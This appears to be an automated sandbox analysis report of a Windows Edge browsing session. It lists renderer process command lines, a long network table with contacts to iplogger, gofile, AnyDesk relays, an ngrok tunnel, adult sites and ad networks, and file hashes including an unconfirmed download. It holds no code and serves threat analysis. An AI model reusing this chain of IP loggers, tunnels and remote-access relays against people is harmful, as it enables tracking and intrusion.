"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rb.gy | udp |
| US | 44.196.17.179:80 | rb.gy | tcp |
| US | 44.196.17.179:80 | rb.gy | tcp |
| US | 8.8.8.8:53 | iplogger.cn | udp |
| US | 104.21.14.168:443 | iplogger.cn | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.17.196.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.14.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | counter.yadro.ru | udp |
| RU | 88.212.201.198:443 | counter.yadro.ru | tcp |
| US | 8.8.8.8:53 | pay.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | stun.fpapi.io | udp |
| NL | 142.250.102.92:443 | pay.google.com | tcp |
| US | 8.8.8.8:53 | 229.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.201.212.88.in-addr.arpa | udp |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| NL | 142.250.102.92:443 | pay.google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 172.217.16.238:443 | google.com | tcp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| NL | 142.250.102.92:443 | pay.google.com | udp |
| US | 8.8.8.8:53 | pay.sandbox.google.com | udp |
| NL | 142.250.102.81:443 | pay.sandbox.google.com | tcp |
| US | 8.8.8.8:53 | 92.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.250.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.iplogger.org | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 172.67.74.161:443 | cdn.iplogger.org | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 45.112.123.126:443 | gofile.io | tcp |
| FR | 45.112.123.126:443 | gofile.io | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| DE | 188.40.69.138:443 | ad.a-ads.com | tcp |
| DE | 188.40.69.138:443 | ad.a-ads.com | tcp |
| US | 8.8.8.8:53 | static.a-ads.com | udp |
| US | 8.8.8.8:53 | 138.69.40.188.in-addr.arpa | udp |
| DE | 213.239.209.209:443 | static.a-ads.com | tcp |
| DE | 213.239.209.209:443 | static.a-ads.com | tcp |
| US | 8.8.8.8:53 | store4.gofile.io | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.209.239.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| DE | 195.181.174.174:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 174.174.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | relay-79bdf984.net.anydesk.com | udp |
| GB | 195.181.165.153:443 | relay-79bdf984.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 153.165.181.195.in-addr.arpa | udp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | 5.68.209.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | x.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 104.244.42.65:443 | x.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| DE | 195.181.174.174:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | api.x.com | udp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| GB | 146.75.72.159:443 | abs.twimg.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 8.8.8.8:53 | t.co | udp |
| GB | 151.101.188.159:443 | pbs.twimg.com | tcp |
| US | 162.159.140.229:443 | t.co | tcp |
| US | 8.8.8.8:53 | relay-aeafd8c0.net.anydesk.com | udp |
| GB | 146.75.72.159:443 | abs.twimg.com | tcp |
| GB | 57.128.141.154:443 | relay-aeafd8c0.net.anydesk.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| US | 8.8.8.8:53 | 159.72.75.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.42.244.104.in-addr.arpa | udp |
| N/A | 239.255.102.18:50002 | udp | |
| US | 8.8.8.8:53 | 2.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.188.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.140.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.141.128.57.in-addr.arpa | udp |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 8.8.8.8:53 | abs-0.twimg.com | udp |
| GB | 151.101.188.158:443 | video.twimg.com | tcp |
| US | 104.244.43.131:443 | abs-0.twimg.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.188.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.43.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 8.8.8.8:53 | 84.27.250.142.in-addr.arpa | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 98.130.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 8.8.8.8:53 | tbi.sb-cd.com | udp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | tcp |
| NL | 185.76.10.17:443 | tbi.sb-cd.com | tcp |
| NL | 185.76.10.17:443 | tbi.sb-cd.com | tcp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| DE | 195.181.175.41:443 | c.ptgncdn.com | tcp |
| DE | 195.181.175.41:443 | c.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | desire2do0961.spankbang.com | udp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.19.130.98:443 | desire2do0961.spankbang.com | tcp |
| US | 8.8.8.8:53 | 5.4.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.10.76.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.175.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 104.21.54.71:443 | creative.xlviirdr.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| US | 8.8.8.8:53 | stats.postgen.com | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.5.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.54.21.104.in-addr.arpa | udp |
| US | 104.21.54.71:443 | creative.xlviirdr.com | tcp |
| DE | 212.102.56.178:443 | static.javhd.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| DE | 169.150.255.184:443 | a.magsrv.com | tcp |
| DE | 169.150.255.184:443 | a.magsrv.com | tcp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| DE | 169.150.255.184:443 | a.magsrv.com | tcp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 104.18.40.50:443 | go.xlviirdr.com | tcp |
| US | 104.18.48.21:443 | video.ktkjmp.com | tcp |
| US | 104.18.40.50:443 | go.xlviirdr.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 178.56.102.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.182.117.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.255.150.169.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.48.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | vstream-36.sb-cd.com | udp |
| US | 8.8.8.8:53 | stripchats.io | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 104.17.118.12:443 | stripchats.io | tcp |
| DE | 212.102.56.130:443 | vstream-36.sb-cd.com | tcp |
| US | 104.17.10.106:443 | img.strpst.com | tcp |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| FR | 185.93.2.12:443 | s3t3d2y8.afcdn.net | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 246.229.211.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.118.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.56.102.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.10.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge-hls.doppiocdn.net | udp |
| CZ | 65.9.95.41:443 | edge-hls.doppiocdn.net | tcp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| CZ | 65.9.95.86:443 | static.hotjar.com | tcp |
| US | 8.8.8.8:53 | crt.rootg2.amazontrust.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| CZ | 65.9.95.72:80 | crt.rootg2.amazontrust.com | tcp |
| US | 8.8.8.8:53 | 12.2.93.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| GB | 54.230.10.124:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | 94.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.10.230.54.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | b-hls-25.doppiocdn.net | udp |
| GB | 18.172.88.92:443 | b-hls-25.doppiocdn.net | tcp |
| GB | 18.172.88.92:443 | b-hls-25.doppiocdn.net | tcp |
| US | 8.8.8.8:53 | 72.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.88.172.18.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| CZ | 65.9.95.118:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | 118.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | guiding-cheetah-vast.ngrok-free.app | udp |
| DE | 3.125.223.134:443 | guiding-cheetah-vast.ngrok-free.app | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 2.23.210.82:80 | e5.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 134.223.125.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| DE | 3.125.223.134:443 | guiding-cheetah-vast.ngrok-free.app | tcp |
| US | 8.8.8.8:53 | cdn.tsyndicate.com | udp |
| NL | 45.133.44.71:443 | cdn.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | tsyndicate.com | udp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| US | 8.8.8.8:53 | acdn.tsyndicate.com | udp |
| NL | 45.133.44.71:443 | acdn.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | ts.trafget.com | udp |
| US | 8.8.8.8:53 | pxl.tsyndicate.com | udp |
| US | 172.67.128.119:443 | ts.trafget.com | tcp |
| DE | 136.243.134.97:443 | pxl.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | 71.44.133.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.46.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.128.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.134.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | fa.openrtb-banner.com | udp |
| US | 172.67.189.45:443 | fa.openrtb-banner.com | tcp |
| US | 8.8.8.8:53 | 45.189.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vstream-48.sb-cd.com | udp |
| NL | 185.76.10.18:443 | vstream-48.sb-cd.com | tcp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| DE | 136.243.11.250:443 | ad.a-ads.com | tcp |
| US | 8.8.8.8:53 | 18.10.76.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.11.243.136.in-addr.arpa | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | a.orbsrv.com | udp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| FR | 185.93.2.11:443 | a.orbsrv.com | tcp |
| US | 8.8.8.8:53 | s.orbsrv.com | udp |
| NL | 95.211.229.248:443 | s.orbsrv.com | tcp |
| DE | 136.243.134.97:443 | pxl.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | 248.229.211.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.2.93.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | vstream-13.sb-cd.com | udp |
| DE | 212.102.56.136:443 | vstream-13.sb-cd.com | tcp |
| US | 8.8.8.8:53 | 136.56.102.212.in-addr.arpa | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| NL | 95.211.229.248:443 | s.orbsrv.com | tcp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| DE | 136.243.134.97:443 | pxl.tsyndicate.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| NL | 95.211.229.248:443 | s.orbsrv.com | tcp |
| NL | 95.211.229.248:443 | s.orbsrv.com | tcp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| US | 8.8.8.8:53 | vstream-47.sb-cd.com | udp |
| NL | 143.244.42.56:443 | vstream-47.sb-cd.com | tcp |
| DE | 136.243.134.97:443 | pxl.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | 56.42.244.143.in-addr.arpa | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| DE | 136.243.4.18:443 | ad.a-ads.com | tcp |
| US | 8.8.8.8:53 | static.a-ads.com | udp |
| DE | 148.251.1.246:443 | static.a-ads.com | tcp |
| US | 8.8.8.8:53 | 18.4.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.251.148.in-addr.arpa | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| DE | 136.243.134.97:443 | pxl.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | vstream-10.sb-cd.com | udp |
| DE | 138.199.37.55:443 | vstream-10.sb-cd.com | tcp |
| DE | 138.199.37.55:443 | vstream-10.sb-cd.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| US | 8.8.8.8:53 | pxl.tsyndicate.com | udp |
| DE | 213.239.193.198:443 | pxl.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | 198.193.239.213.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 2783c40400a8912a79cfd383da731086 |
| SHA1 | 001a131fe399c30973089e18358818090ca81789 |
| SHA256 | 331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5 |
| SHA512 | b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685 |
\??\pipe\LOCAL\crashpad_4088_XQTNHGFMFIYEJDIO
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ff63763eedb406987ced076e36ec9acf |
| SHA1 | 16365aa97cd1a115412f8ae436d5d4e9be5f7b5d |
| SHA256 | 8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c |
| SHA512 | ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d3c9ffdb77d85ef35664a14b0a8124cd |
| SHA1 | 9bb105a02bd8122e48c565d9af6d7b2d2ff0b833 |
| SHA256 | 6332a8b72bd7edc13430c177b33f7610072b91f54f3d21ad98576fa341b6350a |
| SHA512 | 988cbd58aa73e0c3721f294824240a88f0b5f9bb422141364f3e24c391f009b945780cd65de0ffb67ef392985b6aad3706ce864e9f7308590effe3e8628cbeaf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\02528e4a-6ba0-4fd2-aa75-15f06440783f.tmp
| MD5 | 9641eb0e9182036c7c291e3c391eb67c |
| SHA1 | 179cd1b8a1830027a4966d947e1debf8b48969e3 |
| SHA256 | 293c379ff74ba2467e1f9da41a99d4b19e1789bcb41865134c52011b9e83de3a |
| SHA512 | b48a7d72905ec5d1c51d3e26fb35ad877ec132199d9b22d28d20c168f8dd6acb6bbbeaac19b1d843c5f6c77e2ff9415b1f68999bf06675244df13f4d721652ac |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ea3a846370a6f3a6e2f720f4970f4418 |
| SHA1 | c4d55921433592a09b59b10f91bbc2df73173a67 |
| SHA256 | 0c43a40aa7aa7ed44c56c6c3c16df31774795c78e7924e50f94cc75a0ca6cdeb |
| SHA512 | c09a06b4db9890d57117f735e40af9d4cfc20f2c316dd9cb3c8f0675b969063f87aa9e15b91dcdea3ded1c1eb5bc58d4fa87ea83cfedab1b8aff276e85e8b929 |
C:\Users\Admin\Downloads\Unconfirmed 199374.crdownload
| MD5 | 4a729d5343445570968920227f31ab2d |
| SHA1 | 7609d3ad9a2587ca7ac4593fc77b5b5f6747d0ce |
| SHA256 | 50137fb27b1ce05da9659710d1e67fbf93e7770760672f5d20ca98e3e5ea9fb0 |
| SHA512 | de821294f546cb901705d539d65b9e752272eeef308f4504283fb98dfa0b3e3ef29c8ae24d2b0f9e2b42c1ed4f8958e52935f049afb369b6b7d3ddf1db626e12 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e9baeda113fab86d1af16f069daa62ea |
| SHA1 | 7daaaf15a51777fd46b1b6e8506ff8f951319f72 |
| SHA256 | 349baad387313b42fd82dc61d81ab6aeac0f98e4fe12c54b94e201c61f3a4051 |
| SHA512 | e14779bd3f31cce16399ed719757abf59d857f40a01c73f008d105251cf975b95abeb81f96888c8ecce165219621bb35fa7890705b534a0baddd272d0d06e6b8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 7883dd4308bce78532584caa8a946148 |
